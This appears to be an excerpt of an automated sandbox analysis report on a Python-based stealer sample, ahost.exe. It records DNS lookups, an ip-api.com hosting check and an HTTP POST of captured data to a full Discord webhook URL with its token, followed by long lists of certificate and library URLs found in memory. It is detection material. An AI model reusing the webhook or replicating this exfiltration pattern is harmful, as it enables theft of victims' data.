Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF89E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	104_2_00007FF7CF89E21C

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: blank-baxwq.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 694040User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=57f85f30d1587e66d117b2081c55215c

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:37:57 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734075478x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwkuEwvKx%2Fy1ZpufbQaAbIFwSVvPWB2fx%2FQ9pTsSali82LoCYBMuZqcL5aSWX3dZcf4tzU3koKglmm0u9v3dMQVCiodA3OWSmeLvvbehvpOqGgYfig7bgGugaUw%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=59db110601c0cdd6f5cf870796f640135c7dbd50-1734075477; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=JEq3usgsc09laeU6BfULN4MDc08M6NykX3r6GGHoWys-1734075477571-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f144aafcf05c340-EWR

Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi?Sx
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ahost.exe, 00000002.00000002.1869730521.000002162BD00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: ahost.exe, 00000002.00000003.1605942422.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1551563607.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871213413.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866866595.000002162C365000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1640893312.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1551563607.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1867424193.000002162C3D6000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1617803880.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871320397.000002162C3DA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C3E2000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000C.00000002.1542004672.000001FBD9982000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000C.00000002.1542004672.000001FBD9982000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000015.00000002.2645655275.0000021787484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: ahost.exe, 00000002.00000003.1413425472.000002162BA38000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: svchost.exe, 00000015.00000003.1476407714.0000021787600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: ahost.exe, 00000002.00000003.1601685173.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C24D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: ahost.exe, 00000002.00000003.1601685173.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C24D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~
Source: ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
Source: powershell.exe, 0000000C.00000002.1528551982.000001FBD11B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B03038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: ahost.exe, 00000000.00000002.1887734193.00000254B9308000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: ahost.exe, 00000000.00000002.1887734193.00000254B932D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1391772947.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1392657645.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0
